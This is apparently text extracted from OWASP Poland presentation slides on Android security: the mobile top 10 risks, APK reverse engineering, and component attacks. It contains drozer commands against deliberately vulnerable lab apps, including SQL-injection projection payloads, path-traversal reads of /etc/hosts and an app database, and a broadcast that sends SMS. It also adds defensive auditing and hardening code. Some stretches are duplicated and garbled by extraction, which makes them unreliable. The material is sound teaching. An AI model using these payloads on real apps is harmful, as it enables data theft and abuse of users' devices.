• Unrestricted access to app database
  – Just query it – run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
Content providers
    dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to app database
Content providers
    dz> run scanner.provider.finduris -a com.mwr.example.sieve
    Accessible content URIs:
      content://com.mwr.example.sieve.DBContentProvider/Keys/
      content://com.mwr.example.sieve.DBContentProvider/Passwords
      content://com.mwr.example.sieve.DBContentProvider/Passwords/
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
Content providers
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
    unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
    | Password         | pin  |
    | thisismypassword | 9876 |
Content providers attacks
• Path traversal
Content providers
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
    dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
    127.0.0.1 localhost
    dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
    Written 24576 bytes
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug, etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
    <receiver android:name="broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    …
    <uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
    public void onReceive(Context arg0, Intent arg1) {
        context = arg0;
        SmsManager sms = SmsManager.getDefault();
        Bundle bundle = arg1.getExtras();
        sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
        Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
    }
The code above determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action.
Broadcast receivers
Broadcast receivers attacks
    run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies to all the above-mentioned items:
• Setting the android:exported attribute to false (only the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
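Both defenses above can be checked mechanically before drozer is ever pointed at the app. The following added example (my own code, not from the talk or from GoatDroid) parses a constructed manifest modelled on the SendSMSNowReceiver shown earlier and reports the components that other apps can reach without holding any permission, applying the legacy default that a component with an intent-filter is exported unless android:exported says otherwise; the sample manifest and the extra components in it are assumptions for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "provider", "receiver")

# Constructed sample manifest (assumption for illustration) modelled on the
# GoatDroid receiver shown above; it is not the project's real manifest.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.owasp.goatdroid.fourgoats">
  <uses-permission android:name="android.permission.SEND_SMS" />
  <application android:debuggable="true">
    <activity android:name=".activities.Main">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <receiver android:name="broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <receiver android:name="broadcastreceivers.GuardedReceiver"
              android:permission="org.owasp.goatdroid.fourgoats.permission.SOCIAL">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.GUARDED" />
      </intent-filter>
    </receiver>
    <provider android:name=".db.DBContentProvider"
              android:authorities="org.owasp.goatdroid.fourgoats.db"
              android:exported="false" />
    <service android:name=".services.Sync" />
  </application>
</manifest>
"""


def attr(elem, name):
    """Read an android:* attribute (namespaced in the parsed tree)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(elem):
    """An explicit android:exported wins; otherwise a component with an
    <intent-filter> is exported and one without is not. Providers are treated
    as exported unless told otherwise, the platform default for targetSdk < 17."""
    explicit = attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return True
    return elem.find("intent-filter") is not None


def audit_manifest(xml_text):
    """Return (tag, name, reason) for every component another app can reach
    without holding a permission, plus a finding if the app is debuggable."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    findings = []
    if app is None:
        return findings
    if (attr(app, "debuggable") or "").lower() == "true":
        findings.append(("application", root.get("package"), "android:debuggable=true"))
    for elem in app.iter():
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem):
            continue
        if attr(elem, "permission"):
            continue  # reachable, but only by holders of that permission
        actions = {attr(a, "name") for a in elem.iter("action")}
        if "android.intent.action.MAIN" in actions:
            continue  # the launcher activity has to be exported
        reason = ("explicit android:exported=true" if attr(elem, "exported")
                  else "exported by default (intent-filter present)")
        findings.append((elem.tag, attr(elem, "name"), reason))
    return findings


if __name__ == "__main__":
    for tag, name, reason in audit_manifest(SAMPLE_MANIFEST):
        print("%-12s %-45s %s" % (tag, name, reason))
```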
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing an application
• Analyze package files at different stages
    adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or does it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
  – Using known weak ciphers/versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the browser's side
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code
    if (presented_cert == pinned_cert)
        start_connection();
    else
        drop_connection();
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
    mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain)
    sslyze --regular www.example.com:443
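Mallodroid-style checks can be reproduced on the Java that dex2jar and JD-GUI/Luyten produce. The added example below (my own code, not the talk's and not Mallodroid's) scans a constructed decompiler-style class for the trust-all TrustManagers and accept-all hostname verifiers described under Cert Pinning, and also for the insecure algorithms and hardcoded keys that the M6 Broken Cryptography review looks for; the rule set and the sample class are assumptions for illustration.

```python
import re

# Heuristic rules over decompiled Java (dex2jar + JD-GUI/Luyten output).
# Each entry: (rule id, compiled pattern, message). Hits are review leads,
# not proofs: a TrustManager that is never installed is noise, for instance.
RULES = [
    ("TLS-TRUST-ALL",
     re.compile(r"checkServerTrusted\s*\([^)]*\)\s*(?:throws[^{]*)?\{\s*\}"),
     "X509TrustManager.checkServerTrusted with an empty body trusts every certificate"),
    ("TLS-ANY-HOST",
     re.compile(r"ALLOW_ALL_HOSTNAME_VERIFIER|"
                r"verify\s*\(\s*String\s+\w+\s*,\s*SSLSession\s+\w+\s*\)\s*\{\s*return\s+true\s*;"),
     "hostname verification disabled (any host name accepted)"),
    ("TLS-WEAK-PROTO",
     re.compile(r"\"(?:SSLv2|SSLv3|SSL)\""),
     "weak SSL protocol requested from SSLContext"),
    ("CRYPTO-WEAK-ALG",
     re.compile(r"\"(?:RC4|ARCFOUR|DES|DESede|MD4|MD5|SHA-?1)[\"/]"),
     "insecure or deprecated algorithm (RC4, DES, MD4/5, SHA-1)"),
    ("CRYPTO-ECB",
     re.compile(r"getInstance\s*\(\s*\"AES(?:/ECB/[^\"]*)?\"\s*\)"),
     "AES in ECB mode (the provider default when no mode is given)"),
    ("CRYPTO-HARDCODED-KEY",
     re.compile(r"SecretKeySpec\s*\(\s*\"[^\"]+\"\s*\.getBytes"),
     "key material hardcoded as a string literal"),
]

# Constructed decompiler-style class (assumption for illustration, not a real app).
SAMPLE_SOURCE = """\
package com.example.vulnapp;
public class NetHelper {
    TrustManager[] trustAll = new TrustManager[] { new X509TrustManager() {
        public void checkClientTrusted(X509Certificate[] chain, String authType) { }
        public void checkServerTrusted(X509Certificate[] chain, String authType) { }
        public X509Certificate[] getAcceptedIssuers() { return null; }
    } };
    HostnameVerifier hv = new HostnameVerifier() {
        public boolean verify(String hostname, SSLSession session) { return true; }
    };
    SecretKeySpec key = new SecretKeySpec("s3cr3tk3y1234567".getBytes(), "AES");
    Cipher cipher = Cipher.getInstance("AES");
    MessageDigest md = MessageDigest.getInstance("MD5");
    SSLContext ctx = SSLContext.getInstance("TLS");
}
"""


def scan_source(text):
    """Run every rule over the whole text (some patterns span lines) and
    return (rule id, line number, message) findings sorted by line."""
    findings = []
    for rule_id, pattern, message in RULES:
        for m in pattern.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((rule_id, line_no, message))
    return sorted(findings, key=lambda f: f[1])


if __name__ == "__main__":
    for rule_id, line_no, message in scan_source(SAMPLE_SOURCE):
        print("line %2d  %-22s %s" % (line_no, rule_id, message))
```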
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer
    dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
    adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what is it
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer
    dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
[Diagram: DEX → SMALI]
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik byte code (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
bull Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography and permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions?
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
  – Isolation
  – Privilege separation
• How sensitive data is transmitted
  – Extra-device communication
  – Inter-application communication
  – Inter-component communication
Android Application Components
[Diagram: Activities, Services, Content providers, Broadcast receivers]
Android Application Components
AndroidManifest.xml defines the way the app works and what kind of interaction between its components and the outer world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions
  <uses-permission android:name="string" />
  <permission android:protectionLevel="…" />
• Components and their attributes
[Screenshot: AndroidManifest.xml]
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
• debuggable
• enabled
• exported
• permission
[Diagram: Activities, Services, Content providers, Broadcast receivers]
Example components attributes
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested action/data.
  Intent intent = new Intent(Intent.ACTION_VIEW);
  intent.setData(Uri.parse("http://www.google.com"));
  String pack = "com.android.browser";
  ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
  intent.setComponent(comp);
  startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
  dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer is installed in the default package of AppUse together with adb, so it is enough to just "click-and-play"
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it with intents it's possible to achieve the following:
  – Modify data in the background
  – Tricking the user
  – Leaking sensitive information
Activities
Activity components attacks
• General hijacking scheme
[Diagram: general hijacking scheme (A, B, E)]
• Results of an attack:
  – A malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activities
Activity components attacks
• List and launch exported activities
  dz> run app.activity.info -a com.mwr.example.sieve
  Package: com.mwr.example.sieve
    com.mwr.example.sieve.FileSelectActivity
    com.mwr.example.sieve.MainLoginActivity
    com.mwr.example.sieve.PWList
  dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services
Services attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like intents, files or the network stack).
Services
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat to check for sensitive info
• Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
Content providers
Content providers
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions:
  run app.provider.info --permission null
Content providers
Content providers attacks
• Unrestricted access to the app database
  – Just query it – run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
Content providers
  dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
bull Unrestricted access to app database
Content providers
  dz> run scanner.provider.finduris -a com.mwr.example.sieve
  Accessible content URIs:
    content://com.mwr.example.sieve.DBContentProvider/Keys
    content://com.mwr.example.sieve.DBContentProvider/Passwords
    content://com.mwr.example.sieve.DBContentProvider/Passwords/
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --vertical
Content providers attacks
bull SQL injection
Content providers
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --selection "'"
  unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "* FROM Key--"
  | Password         | pin  |
  | thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
  dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  127.0.0.1 localhost
  dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
  Written 24576 bytes
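Added example (not code from the Sieve app or from the slides): a read-only ContentProvider whose query() rejects the --selection "'" and --projection "* FROM Key--" payloads shown above through a projection map and strict mode, and whose openFile() refuses the /etc/hosts and database.db traversals by canonicalising the requested path. The authority, table and column names are assumed; the provider is meant to be declared with android:exported="false" or android:permission in the manifest.

```java
package com.example.hardened; // hypothetical package, not the Sieve app's code

import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.UriMatcher;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;

public class HardenedProvider extends ContentProvider {
    // Assumed authority, table and columns (the Sieve names differ).
    static final String AUTHORITY = "com.example.hardened.provider";
    static final int PASSWORDS = 1;
    static final int BACKUP_FILE = 2;
    static final UriMatcher MATCHER = new UriMatcher(UriMatcher.NO_MATCH);
    static final Map<String, String> PASSWORD_COLUMNS = new HashMap<>();
    static {
        MATCHER.addURI(AUTHORITY, "Passwords", PASSWORDS);
        MATCHER.addURI(AUTHORITY, "backup/*", BACKUP_FILE);
        // Projection map: only these names may appear in a projection, so a
        // projection of "* FROM Key--" is rejected instead of spliced into SQL.
        PASSWORD_COLUMNS.put("_id", "_id");
        PASSWORD_COLUMNS.put("service", "service");
        PASSWORD_COLUMNS.put("username", "username");
    }
    private SQLiteDatabase db;

    @Override
    public boolean onCreate() {
        db = SQLiteDatabase.openOrCreateDatabase(getContext().getDatabasePath("hardened.db"), null);
        return true;
    }

    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        if (MATCHER.match(uri) != PASSWORDS) {
            throw new IllegalArgumentException("Unknown URI " + uri);
        }
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("Passwords");
        qb.setProjectionMap(PASSWORD_COLUMNS);
        // Strict mode wraps and verifies the caller-supplied selection, so a
        // selection of "'" fails with an exception rather than producing the
        // "unrecognized token" SQL error that reveals the query structure.
        qb.setStrict(true);
        return qb.query(db, projection, selection, selectionArgs, null, null, sortOrder);
    }

    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        if (MATCHER.match(uri) != BACKUP_FILE || !"r".equals(mode)) {
            throw new FileNotFoundException("Not readable: " + uri);
        }
        File root;
        File target;
        try {
            // Resolve the name inside the one allowed directory and canonicalise
            // both sides so that "../" segments and symlinks are resolved first.
            root = new File(getContext().getFilesDir(), "backup").getCanonicalFile();
            target = new File(root, uri.getLastPathSegment()).getCanonicalFile();
        } catch (IOException e) {
            throw new FileNotFoundException(e.getMessage());
        }
        // Anything that escaped the directory (e.g. /etc/hosts, /data/data/.../database.db)
        // is refused instead of being served like the FileBackupProvider above.
        if (!target.getPath().startsWith(root.getPath() + File.separator)) {
            throw new FileNotFoundException("Path traversal refused: " + uri);
        }
        return ParcelFileDescriptor.open(target, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    // Read-only provider: writes through IPC are not offered at all.
    @Override public String getType(Uri uri) { return "vnd.android.cursor.dir/vnd.hardened.passwords"; }
    @Override public Uri insert(Uri uri, ContentValues v) { throw new UnsupportedOperationException(); }
    @Override public int delete(Uri uri, String s, String[] a) { throw new UnsupportedOperationException(); }
    @Override public int update(Uri uri, ContentValues v, String s, String[] a) { throw new UnsupportedOperationException(); }
}
```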
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plugged, etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
  <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
      <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
  </receiver>
  …
  <uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
  public void onReceive(Context arg0, Intent arg1) {
      context = arg0;
      SmsManager sms = SmsManager.getDefault();
      Bundle bundle = arg1.getExtras();
      sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
      Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
  }
Broadcast receivers
Broadcast receivers attacks
